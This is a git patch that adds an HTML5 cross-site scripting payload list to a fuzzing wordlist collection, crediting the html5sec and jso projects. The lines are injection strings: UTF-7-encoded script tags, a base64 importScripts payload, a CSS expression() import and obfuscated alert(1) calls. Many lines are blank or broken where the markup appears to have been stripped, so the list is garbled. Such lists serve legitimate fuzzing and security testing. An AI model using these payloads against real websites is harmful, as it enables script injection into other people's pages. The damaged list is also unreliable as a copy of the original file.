From 96910294b0b67c6fb17c28aea1f566a44d284174 Mon Sep 17 00:00:00 2001 From: jhaddix Date: Sun, 29 Jun 2014 10:46:13 -0700 Subject: [PATCH] Create JHADDIX_HTML5sec_Injections.txt initial HTML5Sec list --- Fuzzing/JHADDIX_HTML5sec_Injections.txt | 138 ++++++++++++++++++++++++ 1 file changed, 138 insertions(+) create mode 100644 Fuzzing/JHADDIX_HTML5sec_Injections.txt diff --git a/Fuzzing/JHADDIX_HTML5sec_Injections.txt b/Fuzzing/JHADDIX_HTML5sec_Injections.txt new file mode 100644 index 00000000000..e8d45ce9b4f --- /dev/null +++ b/Fuzzing/JHADDIX_HTML5sec_Injections.txt @@ -0,0 +1,138 @@ +## From Paweł Krawczyk (https://github.com/kravietz/text-jso) and http://heideri.ch/jso/ + +
+&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi +&alert&A7&(1)&R&UA;&&<&A9&11/script&X&> +0? :postMessage(importScripts('data:;base64,cG9zdE1lc3NhZ2UoJ2FsZXJ0KDEpJyk')) + + + + +X + + +





...



+01 + + +X + + +¼script ¾alert(1)//¼/script ¾ + + + +
+1 +;1 ++ADw-html+AD4APA-body+AD4APA-div+AD4-top secret+ADw-/div+AD4APA-/body+AD4APA-/html+AD4-.toXMLString().match(/.*/m),alert(RegExp.input); + +1 +@import "data:,*%7bx:expression(write(1))%7D"; + +
+XXXXXX +1 +1 +XXX + + +><image xlink:href=" + +
  • +XXX +Hello +X +
    XXX
    +
    XXX
    + + + + + + + + +